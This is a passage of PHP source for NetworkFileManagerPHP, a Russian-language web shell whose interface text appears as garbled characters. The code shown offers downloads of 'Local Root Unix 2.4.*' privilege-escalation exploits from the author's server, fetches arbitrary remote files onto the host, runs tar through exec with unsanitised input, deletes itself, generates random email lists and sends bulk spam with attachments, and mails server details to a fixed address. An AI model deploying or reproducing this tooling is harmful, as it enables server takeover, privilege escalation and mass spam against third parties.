<tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
|
|
<b>Local Root Unix 2.4.*</b> (ôàéë çàïóñêà <u>$private[7]</u> )</td></tr>
|
|
<tr>
|
|
<td class=pagetitle width=500> $title_exp[7]</td>
|
|
<td width=100><input type='hidden' name='file3' value='$private_site$private[7]'>
|
|
<input type='hidden' name='file2' value='$private[7]'>
|
|
<input type='submit' value='Çàãðóçèòü ôàéë' class=button1 $style_button></td></tr>
|
|
</form></table>";
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
|
|
<tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
|
|
<b>Local Root Unix 2.4.*</b> (ôàéë çàïóñêà <u>$private[8]</u> )</td></tr>
|
|
<tr>
|
|
<td class=pagetitle width=500> $title_exp[8]</td>
|
|
<td width=100><input type='hidden' name='file3' value='$private_site$private[8]'>
|
|
<input type='hidden' name='file2' value='$private[8]'>
|
|
<input type='submit' value='Çàãðóçèòü ôàéë' class=button1 $style_button></td></tr>
|
|
</form></table>";
|
|
}
|
|
|
|
|
|
# ñîçäàíèå íîâîé äåðèêòîðèè
|
|
function newdir($dir) {
|
|
global $tm,$nd;
|
|
print("<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'post' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Ñîçäàòü äåðèêòîðèþ:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='Cîçäàòü' class=button1 $style_button></td></tr></form></table>");
|
|
}
|
|
|
|
function cdir($dir) {
|
|
global $newd,$tm;
|
|
$fullpath = $dir."/".$newd;
|
|
if (file_exists($fullpath)) @rmdir($fullpath);
|
|
if (@mkdir($fullpath,0777)) {
|
|
echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Äèðåêòîðèÿ ñîçäàíà.</font></center></td></tr></table>";
|
|
} else {
|
|
echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Îøèáêà â ñîçäàíèè äåðèêòîðèè.</font></center></td></tr></table>";
|
|
}
|
|
chdir($tm);
|
|
getdir();
|
|
readdirdata($tm);
|
|
}
|
|
// ñîçäàíèå äååêðèòîðèè Files äëÿ çàãðóçêè ôàéëîâ
|
|
function downfiles() {
|
|
global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2, $gdir,$gsub,$i,$j,$REMOTE_ADDR;
|
|
$st = getcwd();
|
|
$st = str_replace("\\","/",$st);
|
|
$j = 0;
|
|
$gdir = array();
|
|
$gsub = array();
|
|
print("<br>");
|
|
for ($i=0;$i<=(strlen($st)-1);$i++) {
|
|
if ($st[$i] != "/") {
|
|
$gdir[$j] = $gdir[$j].$st[$i];
|
|
$gsub[$j] = $gsub[$j].$st[$i];
|
|
} else {
|
|
$gdir[$j] = $gdir[$j]."/";
|
|
$gsub[$j] = $gsub[$j]."/";
|
|
$gdir[$j+1] = $gdir[$j];
|
|
$j++;
|
|
}
|
|
}
|
|
print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=50% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b> Ïóòü: </b>");
|
|
for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>");
|
|
print("</TABLE> ");
|
|
|
|
echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<form enctype='multipart/form-data' action='$PHP_SELF?action=down&status=ok' method=post>
|
|
<tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
|
|
<b>Çàãðóçêà ôàéëîâ ñ óäàëåííîãî êîìïüþòåðà:</b></td></tr>
|
|
<tr>
|
|
<td class=pagetitle width=400> HTTP ïóòü äî ôàéëà:</td>
|
|
<td width=200><input type='text' name='file3' value='http://' size=40></td>
|
|
</tr>
|
|
<tr>
|
|
<td class=pagetitle width=400> Íàçâàíèå ôàéëà èëè ïóòü ñ íàçâàíèåì ôàéëà</td>
|
|
<td width=200><input type='text' name='file2' value='' size=40></td>
|
|
</tr>
|
|
<tr>
|
|
|
|
<td width=600 colspan=2 align=center><input type='submit' value='Çàãðóçèòü ôàéë' class=button1 $style_button></td></tr></td>
|
|
|
|
|
|
</tr></form></table>";
|
|
|
|
}
|
|
|
|
# óäàëåíèå äåðèêòîðèè
|
|
function deldir() {
|
|
global $dd,$tm;
|
|
$fullpath = $tm."/".$dd;
|
|
echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Äèðåêòîðèÿ óäàëåíà.</font></center></td></tr></table>";
|
|
rmdir($fullpath);
|
|
chdir($tm);
|
|
getdir();
|
|
readdirdata($tm);
|
|
}
|
|
|
|
# àðõèâàöèÿ äèðåêòîðèè
|
|
function arhiv() {
|
|
global $tar,$tm,$pass;
|
|
$fullpath = $tm."/".$tar;
|
|
|
|
echo "<br>
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr><td> <font color='#FFFFCC' face='Tahoma' size = 2>Äåðèêòîðèÿ <u><b>$fullpath</b></u> ".exec("tar -zc $fullpath -f $pass.tar.gz")."óïàêîâàíà â ôàéë <u>$pass.tar.gz</u></font></center></td></tr></table>";
|
|
|
|
}
|
|
|
|
function down($dir) {
|
|
global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2;
|
|
ignore_user_abort(1);
|
|
set_time_limit(0);
|
|
echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr><td align=center class=pagetitle><b>Çàãðóçêà ôàéëîâ</b></font></b></td></tr>
|
|
<tr><td bgcolor=#FFFFCC><br><blockquote>×àñòåíüêî ñëó÷àåòñÿ, ÷òî íà ñåðâåðàõ ãäå óñòàíîâëåí <b>NFM</b> íå ðàáîòàåò <b>wget</b>, à ôàéë çàãðóçèòü îé êàê õî÷åòñÿ, òàêèì îáðàçîì ñ ïîìîùüþ ïðîñòûõ ôóíêöèé âû ñìîæåòå çàãðóçèòü ëþáîé ôàéë íà ñâîé õîñòèíã â ïàïêó, ãäå çàëèò NFM ëèáî äðóãóþ êàêóþ âû âûáåðåòå (ñì.<b>Ïóòü</b>).( ðàáîòàåò íå íà âñåõ õîñòèíãàõ)</blockquote></td></tr>
|
|
</table>";
|
|
|
|
if (!isset($status)) downfiles();
|
|
|
|
else
|
|
{
|
|
|
|
$data = @implode("", file($file3));
|
|
$fp = @fopen($file2, "wb");
|
|
@fputs($fp, $data);
|
|
$ok = @fclose($fp);
|
|
if($ok)
|
|
{
|
|
$size = filesize($file2)/1024;
|
|
$sizef = sprintf("%.2f", $size);
|
|
|
|
print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Âû çàãðóçèëè: <b>ôàéë <u>$file2</u> ðàçìåðîì</b> (".$sizef."êÁ) </font></center></td></tr></table>";
|
|
}
|
|
else
|
|
{
|
|
print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0BAACC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2><b>Îøèáêà çàãðóçêè ôàéëà</b></font></center></td></tr></table>";
|
|
}
|
|
}
|
|
}
|
|
|
|
# îòïðàâêà ïî÷òû
|
|
function mailsystem() {
|
|
global $status,$form,$action,$name,$email,$pole,$REMOTE_ADDR,$HTTP_REFERER,$DOCUMENT_ROOT,$PATH_TRANSLATED,$HTTP_HOST;
|
|
|
|
echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr><td align=center class=pagetitle><b>Âîïðîñû è ïîæåëàíèÿ ïî ñêðèïòó NetworkFileManagerPHP</b></font></b></td></tr>
|
|
<tr><td bgcolor=#FFFFCC><br>
|
|
<blockquote>
|
|
 ïðîöåññå ðàáîòû ñî ñêðèïòîì NFM ó âàñ ìîãóò âîçíèêíóòü âîïðîñû è íîâûå ïðåäëîæåíèÿ ïî óëó÷øåíèþ èëè äîáàâëåíèþ ôóíêöèé â NFM, âñå âàøè ïðåäëîæåíèÿ áóäóò ðàññìîòðåíû è áóäóò ðåàëèçîâàíû â äàëüíåéøèõ âåðñèÿõ NFM.
|
|
</blockquote></td></tr>
|
|
</table>";
|
|
|
|
if (!isset($status)) echo "$form";
|
|
else {
|
|
$email_to ="duyt@yandex.ru";
|
|
$subject = "NetworkFileManagerPHP ($name)";
|
|
$headers = "From: $email";
|
|
|
|
$info = "---==== Ñîîáùåíèå îò ($name)====---\n\n";
|
|
$info .= "Name:\t$name\n";
|
|
$info .= "Email:\t$email\n";
|
|
$info .= "What?:\n\t$pole\n\n";
|
|
$info .= "IP:\t$REMOTE_ADDR\n";
|
|
$info .= "HOST:\t$HTTP_HOST\n";
|
|
$info .= "URL:\t$HTTP_REFERER\n";
|
|
$info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
|
|
$send_to = "$email_to";
|
|
|
|
$send = mail($send_to, $subject, $info, $headers);
|
|
if($send == 2) echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Ñïàñèáî!!!Âàøå ñîîáùåíèå îòïðàâëåíî.</font></center></td></tr></table><br>";
|
|
}
|
|
}
|
|
|
|
function spam() {
|
|
global $chislo, $status, $from, $otvet, $wait, $subject, $body, $file, $check_box, $domen;
|
|
set_time_limit(0);
|
|
ignore_user_abort(1);
|
|
echo "<br>
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr><td align=center class=pagetitle><b>Óíèêàëüíûé ñïàìåð</b></font></b></td></tr>
|
|
<tr><td bgcolor=#FFFFCC><br><blockquote> Òåïåðü âàì íå íóæíî ïîêóïàòü ñïàìëèñòû, NFM ñàì â ñîñòîÿíèè ñãåíåðèòü ëþáóþ áàçó, âàëèäíîñòü êîòîðîé áóäåò 50-60% </blockquote></td></tr>
|
|
</table>";
|
|
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<form action='$PHP_SELF?action=spam' method=post>
|
|
<tr><td align=left valign=top colspan=4 class=pagetitle>
|
|
<b>Ãåíåðàòîð email:</b></td></tr>
|
|
<tr> <tr><td align=left valign=top colspan=4 bgcolor=#FFFFCC width=500>
|
|
Äàííûé ñïàìåð ðàçáèò íà äâà ýòàïà: <br>
|
|
<b>1.</b> Ãåíåðàöèÿ email ïî óæå âëîæåííûì äîìåíàì â ñêðèïò èëè ãåíåðàöèÿ email ïî óêàçàííîìó âàìè äîìåíó. Âûáîð êîëëè÷åñòâà ãåíåðèðîâàíûõ ïèñåì ( óáåäèòåëüíàÿ ïðîñüáà ãåíåðèðîâàòü íå áîëüøå <u><i>10 000</i></u> )<br>
|
|
<b>2.</b> Óêàçàíèå íåîáõîäèìûõ äàííûõ äëÿ ñïàìà</td></tr>
|
|
<td align=left colspan=2 class=pagetitle> <input type='checkbox' name='check_box[]'> Åñëè <b>checked</b> òî äîìåíû ïî äåôîëòó, åñëè íå <b>checked</b> òî âàø äîìåí.</td></tr>
|
|
<tr><td align=center class=pagetitle width=200> Ñêîëüêî email ãåíåðèòü:</td>
|
|
<td align=left colspan=2>
|
|
<input class='inputbox' type='text' name='chislo' size=10> </td></tr>
|
|
<tr><td align=center class=pagetitle width=200> Câîé äîìåí:</td>
|
|
<td align=left width=200>
|
|
<input class='inputbox' type='text' name='domen[]'> </td>
|
|
</tr>
|
|
<tr><td width=500 align=center colspan=2><input type='submit' value='Ãåíåðèòü' class=button1 $style_button>
|
|
</td></tr>
|
|
|
|
</form></table>";
|
|
// ñîãëàñíûå
|
|
function s() {
|
|
$word="qwrtpsdfghklzxcvbnm";
|
|
return $word[mt_rand(0,strlen($word)-1)];
|
|
}
|
|
// ãëàñíûå
|
|
function g() {
|
|
$word="eyuioa";
|
|
return $word[mt_rand(0,strlen($word)-2)];
|
|
}
|
|
// öèôðû
|
|
function c() {
|
|
$word="1234567890";
|
|
return $word[mt_rand(0,strlen($word)-3)];
|
|
}
|
|
// ñîãëàñíûå ñ ãëàñíûìè
|
|
function a() {
|
|
$word=array('wa','sa','da','qa','ra','ta','pa','fa','ga','ha','ja','ka','la','za','xa','ca','va','ba','na','ma');
|
|
$ab1=count($word);
|
|
return $wq=$word[mt_rand(0,$ab1-1)];
|
|
}
|
|
|
|
function o() {
|
|
$word=array('wo','so','do','qo','ro','to','po','fo','go','ho','jo','ko','lo','zo','xo','co','vo','bo','no','mo');
|
|
$ab2=count($word);
|
|
return $wq2=$word[mt_rand(0,$ab2-1)];
|
|
}
|
|
function e() {
|
|
$word=array('we','se','de','qe','re','te','pe','fe','ge','he','je','ke','le','ze','xe','ce','ve','be','ne','me');
|
|
$ab3=count($word);
|
|
return $wq3=$word[mt_rand(0,$ab3-1)];
|
|
}
|
|
|
|
function i() {
|
|
$word=array('wi','si','di','qi','ri','ti','pi','fi','gi','hi','ji','ki','li','zi','xi','ci','vi','bi','ni','mi');
|
|
$ab4=count($word);
|
|
return $wq4=$word[mt_rand(0,$ab4-1)];
|
|
}
|
|
function u() {
|
|
$word=array('wu','su','du','qu','ru','tu','pu','fu','gu','hu','ju','ku','lu','zu','xu','cu','vu','bu','nu','mu');
|
|
$ab5=count($word);
|
|
return $wq5=$word[mt_rand(0,$ab5-1)];
|
|
}
|
|
|
|
function name0() { return c().c().c().c(); }
|
|
function name1() { return a().s(); }
|
|
function name2() { return o().s(); }
|
|
function name3() { return e().s(); }
|
|
function name4() { return i().s(); }
|
|
function name5() { return u().s(); }
|
|
function name6() { return a().s().g(); }
|
|
function name7() { return o().s().g(); }
|
|
function name8() { return e().s().g(); }
|
|
function name9() { return i().s().g(); }
|
|
function name10() { return u().s().g(); }
|
|
function name11() { return a().s().g().s(); }
|
|
function name12() { return o().s().g().s(); }
|
|
function name13() { return e().s().g().s(); }
|
|
function name14() { return i().s().g().s(); }
|
|
function name15() { return u().s().g().s(); }
|
|
|
|
|
|
$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
|
|
$domain1=array('mail.ru','hotmail.com','aol.com','yandex.ru','rambler.ru','bk.ru','pochta.ru','mail333.com','yahoo.com','lycos.com','eartlink.com');
|
|
$d1c=count($domain1);
|
|
|
|
function randword() {
|
|
global $cool,$cool2;
|
|
$func="name".mt_rand(0,15);
|
|
$func2="name".mt_rand(0,15);
|
|
switch (mt_rand(0,2)) {
|
|
case 0: return $func().$func2();
|
|
case 1: return $func().$cool[mt_rand(0,count($cool)-9)];
|
|
case 2: return $func();
|
|
default: return $func();
|
|
}
|
|
}
|
|
|
|
if (@unlink("email.txt") < 0){
|
|
echo "ïóñòî";
|
|
exit;
|
|
}
|
|
$file="email.txt";
|
|
|
|
|
|
if($chislo){
|
|
|
|
|
|
$cnt3=mt_rand($chislo,$chislo);
|
|
for ($i=0; $i<$cnt3; $i++) {
|
|
$u=randword();
|
|
if(!isset($check_box)){
|
|
|
|
if ( IsSet($_POST["domen"]) && sizeof($_POST["domen"]) > 0 )
|
|
{
|
|
$domen = $_POST["domen"];
|
|
foreach( $domen as $k=>$v )
|
|
{
|
|
$d=$domen[mt_rand(0,$v-1)];
|
|
|
|
}
|
|
}
|
|
$f=@fopen(email.".txt","a+");
|
|
fputs($f,"$u@$d\n");
|
|
}else{
|
|
|
|
$d=$domain1[mt_rand(0,$d1c-1)];
|
|
$f=@fopen(email.".txt","a+");
|
|
fputs($f,"$u@$d\n");
|
|
}
|
|
|
|
}
|
|
$address = $file;
|
|
if (@file_exists($address)) {
|
|
if($changefile = @fopen ($address, "r")) {
|
|
$success = 1;
|
|
} else {
|
|
echo " Íå íàéäåí ôàéë <b>\"".$address."\"</b> !<br>";
|
|
}
|
|
|
|
if ($success == 1) {
|
|
echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>";
|
|
echo "<tr><td align=center class=pagetitle width=500> Ñãåíåðåííî âñåãî <b>$chislo</b> email.</td></tr>";
|
|
echo "<tr><td align=center> ";
|
|
echo "<textarea name=\"email\" rows=\"13\" cols=\"58\" class=inputbox>";
|
|
while($line = @fgets($changefile,1024)) {
|
|
echo @trim(stripslashes($line))."\n";
|
|
}
|
|
echo"</textarea></td></tr></table>";
|
|
}
|
|
}
|
|
if (!isset($action)){
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<form action='$PHP_SELF?action=spam1&status=ok' method=post enctype='multipart/form-data'>
|
|
<tr><td align=center class=pagetitle colspan=2><b>Ãëàâíûå íàñòðîéêè ñïàìåðà</b></font></b></td></tr>
|
|
<tr><td align=center class=pagetitle width=150> Îò êîãî ïèñüìî:</td>
|
|
<td align=left width=350>
|
|
<input class='inputbox' type='text' name='from' size=50></td></tr>
|
|
<tr><td align=center class=pagetitle width=150> Êóäà îòâåò:</td>
|
|
<td align=left width=350>
|
|
<input class='inputbox' type='text' name='otvet' size=50></td></tr>
|
|
<tr><td align=center class=pagetitle width=150> Èíòåðâàë îòïðàâêè (ñåê):</td>
|
|
<td align=left width=350>
|
|
<input class='inputbox' type='text' name='wait' size=50></td></tr>
|
|
<tr><td align=center class=pagetitle width=150> Òåìà ñîîáùåíèÿ:</td>
|
|
<td align=left width=350>
|
|
<input class='inputbox' type='text' name='subject' size=50></td></tr>
|
|
<tr><td align=center class=pagetitle width=150> Òåêñò ïèñüìà:</td>
|
|
<td align=left width=350>
|
|
<textarea name='body' rows='13' cols='60' class=inputbox> </textarea></td></tr>
|
|
<tr><td align=center class=pagetitle width=150> Ôàéë:</td>
|
|
<td align=left width=350>
|
|
<input class='inputbox' type='file' name='filess' size=30></td></tr>
|
|
<tr><td width=500 align=center colspan=2>
|
|
<input type='submit' value='Ãåíåðèòü' class=button1 $style_button >
|
|
<INPUT TYPE='hidden' NAME='$chislo'>
|
|
</td></tr>
|
|
</form></table>";
|
|
}
|
|
}
|
|
}
|
|
function del() {
|
|
global $PHP_SELF;
|
|
$file_to_delete = basename("$PHP_SELF");
|
|
@chmod("$file_to_delete", 0777);
|
|
if (@unlink("$file_to_delete") < 0){
|
|
echo "ïóñòî";
|
|
exit;
|
|
}
|
|
echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr><td align=center class=pagetitle><b>Óäàëåíèå NFM</b></font></b></td></tr>
|
|
</table>";
|
|
}
|
|
|
|
function spam1() {
|
|
global $status, $from, $otvet, $wait, $subject, $body, $filess, $chislo, $action;
|
|
set_time_limit(0);
|
|
ignore_user_abort(1);
|
|
|
|
echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr><td align=center class=pagetitle><b>Îòïðàâêà ïèñåì ñ çàäàíûìè îïöèÿìè</b></font></b></td></tr>
|
|
</table>";
|
|
|
|
|
|
error_reporting(63); if($from=="") { print
|
|
"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Îò êîãî ïèñüìî>')</script>";exit;}
|
|
error_reporting(63); if($otvet=="") { print
|
|
"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Êóäà îòâåò>')</script>";exit;}
|
|
error_reporting(63); if($wait=="") { print
|
|
"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Èíòåðâàë îòïðàâêè>')</script>";exit;}
|
|
error_reporting(63); if($subject=="") { print
|
|
"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Òåìà ñîîáùåíèÿ>')</script>";exit;}
|
|
error_reporting(63); if($body=="") { print
|
|
"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Òåëî ïèñüìà>')</script>";exit;}
|
|
|
|
$address = "email.txt";
|
|
$counter = 0;
|
|
if (!isset($status)) echo "÷òî-òî íå òàê";
|
|
else {
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr><td align=center bgcolor=#FFFFCC>Îòêðûâàåì ôàéë <b>\"".$address."\"</b> ... <br></td></tr>
|
|
";
|
|
if (@file_exists($address)) {
|
|
echo "
|
|
<tr><td align=center bgcolor=#FFFFCC>Ôàéë <b>\"".$address."\"</b> íàéäåí...<br></td></tr>
|
|
";
|
|
if($afile = @fopen ($address, "r")) {
|
|
echo "
|
|
<tr><td align=center bgcolor=#FFFFCC>Ôàéë <b>\"".$address."\"</b> îòêðûò äëÿ ÷òåíèÿ...<br></td></tr>
|
|
";
|
|
} else {
|
|
echo "
|
|
<tr><td align=center class=pagetitle>Ôàéë <b>\"".$address."\"</b> íå ìîãó îòêðûòü äëÿ ÷òåíèÿ...<br></td></tr>
|
|
";
|
|
}
|
|
} else {
|
|
echo "There is no file <b>\"".$address."\"</b> !<br>";
|
|
$status = "íå ìîãó íàéòè ôàéëà \"".$address."\" ...";
|
|
}
|
|
echo "
|
|
<tr><td align=center bgcolor=#FFFFCC>Íà÷èíàåì ÷òåíèå èç ôàéëà <b>\"".$address."\"</b> ...<br></td></tr>
|
|
</table>";
|
|
if (@file_exists($address)) {
|
|
|
|
while (!feof($afile)) {
|
|
|
|
$line = fgets($afile, 1024);
|
|
$line = trim($line);
|
|
$recipient = "";
|
|
$recipient = $line;
|
|
|
|
if ($filess) {
|
|
$content = fread(fopen($filess,"r"),filesize($filess));
|
|
$content = chunk_split(base64_encode($content));
|
|
$name = basename($filess);
|
|
} else {
|
|
$content ='';
|
|
}
|
|
$boundary = uniqid("NextPart_");
|
|
|
|
$header = "From: ".$from."\r\n";
|
|
$header .= "Reply-To: ".$otvet."\r\n";
|
|
$header .= "Errors-To: ".$otvet."\r\n";
|
|
$header .= "X-Mailer: MSOUTLOOK / ".phpversion()."\r\n";
|
|
$header .= "Content-Transfer-Encoding: 8bits\n";
|
|
$header .= "Content-Type: text/html; charset=\"windows-1251\"\n\n";
|
|
$header .= $body;
|
|
$header .="--$boundary\nContent-type: text/html; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$filess \nContent-disposition: inline; filename=$filess \nContent-transfer-encoding: base64\n\n$content\n\n--$boundary--";
|
|
|
|
|
|
$pattern="#^[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+";
|
|
$pattern.="@";
|
|
$pattern.="[-!\#$%&\"*+\\/\d=?A-Z^_|'a-z{|}~]+\.";
|
|
$pattern.="[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+$#";
|
|
|
|
if($recipient != "")
|
|
{
|
|
if(preg_match($pattern,$recipient))
|
|
{
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr><td align=center class=pagetitle>Îòïðàâëÿåì ïèñüìî íà <b>\"".$recipient."\"</b>...îòïðàâëåíî ";
|
|
|
|
|
|
if(@mail($recipient, stripslashes($subject), stripslashes($header))) {
|
|
$counter = $counter + 1;
|
|
echo "<b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>";
|
|
} else {
|
|
echo "<tr><td align=center class=pagetitle>Íå êîððåêòíûé email, ñîîáùåíèå íå îòïðàâëåíî !</td></tr> </table>";
|
|
}
|
|
} else {
|
|
$counter = $counter + 1;
|
|
|
|
}
|
|
} else {
|
|
echo "<br>";
|
|
}
|
|
$sec = $wait * 1000000;
|
|
usleep($sec);
|
|
|
|
}
|
|
|
|
if($otvet != "")
|
|
{
|
|
|
|
if(preg_match($pattern,$otvet))
|
|
{
|
|
echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr><td align=center class=pagetitle>Îòïðàâëÿåì ïèñüìî íà <b>\"".$otvet."\"</b> äëÿ ïðîâåðêè";
|
|
$subject = "".$subject;
|
|
|
|
if(@mail($otvet, stripslashes($subject), stripslashes($message), stripslashes($header))) {
|
|
$counter = $counter + 1;
|
|
echo " îòïðàâëåíî... <b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>";
|
|
} else {
|
|
echo "<tr><td align=center class=pagetitle>íå îòïðàâëåíî...</td></tr> </table>";
|
|
}
|
|
} else {
|
|
echo "<tr><td align=center class=pagetitle>óêàçàí íå ïðàâëüíûé email.</td></tr> </table>";
|
|
}
|
|
} else {
|
|
}
|
|
|
|
if(@fclose ($afile)) {
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr><td align=center class=pagetitle>Ôàéë <b>\"".$address."\"</b> óñïåøíî çàêðûò!<br></td></tr> </table>";
|
|
} else {
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr><td align=center class=pagetitle>Ôàéë <b>\"".$address."\"</b> íå ìîãó çàêðûòü!<br></td></tr> </table>"; }
|
|
} else {
|
|
echo "íå ìîãó ïðî÷èòàòü ôàéë <b>\"".$afile."\"</b> ...<br>";
|
|
}
|
|
|
|
$status2 ="Ñòàòóñ: ".$counter." emailîâ îòîñëàíî.";
|
|
echo "<br>";
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr><td align=center class=pagetitle>$status2</td></tr> </table>";
|
|
|
|
}
|
|
}
|
|
|
|
# ïîìîùü
|
|
function help() {
|
|
global $action,$REMOTE_ADDR,$HTTP_REFERER;
|
|
echo "<br>
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr><td align=center class=pagetitle><b>Îïèñàíèå ñêðèïòà NetworkFileManagerPHP</b></font></b></td></tr>
|
|
<tr><td bgcolor=#FFFFCC>
|
|
|
|
<blockquote><br>
|
|
Äàííûé ñêðèïò ïèñàëñÿ âíà÷àëå òîëüêî äëÿ àäìèíèñòðàòèðîâàíèÿ ñâîåãî õîñòèíãà, íî â ïðîöåññå íàïèñàíèÿ
|
|
îí ïîçâîëÿë ñâîáîäíî ïåðåìåùàòüñÿ ïî ïàïêàì õîñòèíãà è ïðîñìàòðèâàòü ðàçëè÷íóþ èíôîðìàöèþ,
|
|
êîòîðàÿ äîñòóïíà òîëüêî root, â ïðîöåññå ýâîëþöèè ñêðèïòà ÿ åãî äîïîëíèë óíèêàëüíûìè ñâîéñòâàìè,
|
|
êîòîðûå äîñòóïíû âñåãî â îäíîì ôàéëèêå, âñå îñòàëüíûå ôàéëû íåîáõîäèìûå äëÿ åãî ðàáîòû ñîçäàþòñÿ â ïàïêå,
|
|
ãäå çàëèò NFM. Òî åñòü äàííûé ñêðèïò ïîëíîñòüþ àâòîíîìåí çà èñêëþ÷åíèåì ýêñïëîéòîâ, êîòîðûå õðàíÿòñÿ íà ìîåì
|
|
ñåðâåðå è äîñòóïíû äëÿ ñêà÷èâàíèÿ, ïîñðåäñòâîì PHP.<br><br>
|
|
|
|
<b>NetworkFileManagerPHP</b> - ñêðèïò äëÿ ïîëíîãî àäìèíèñòðàòèðîâàíèÿ ñâîåãî ñàéòà, à òàêæå è õîñòèíãà,
|
|
